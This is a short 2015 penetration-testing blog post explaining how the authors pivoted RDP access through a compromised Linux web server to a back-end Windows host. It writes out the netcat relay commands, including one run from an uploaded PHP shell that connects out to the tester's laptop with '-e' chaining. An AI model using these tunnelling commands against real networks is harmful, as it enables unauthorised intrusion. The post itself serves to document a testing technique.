A blog about generally interesting infosec stuff by Darren Fuller/Paul Marsh, SecQuest Information Security https://www.secquest.co.uk

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver which we've got a PHP command shell on. We know that there are Windows boxes on the back-end so needed a way to get comms tunnelled through to them. At this point we could use something like Meterpreter but wanted a quick/dirty solution that didn't involve creating files, uploading etc. Fortunaely the system had netcat installed!

So firstly we needed netcat to listen on port 53 (DNS) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command sets up a listener on TCP 53 then relays that connection via anther netcat instance to a local listener on RDP port 3389:

nc -l -p 53 -e nc -l -p 3389

From the PHP command shell we had on the WWW server we then ran the following command:

nc hacker-laptop -p 53 -e nc windows-server -p 3389

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Again, proof that netcat rocks!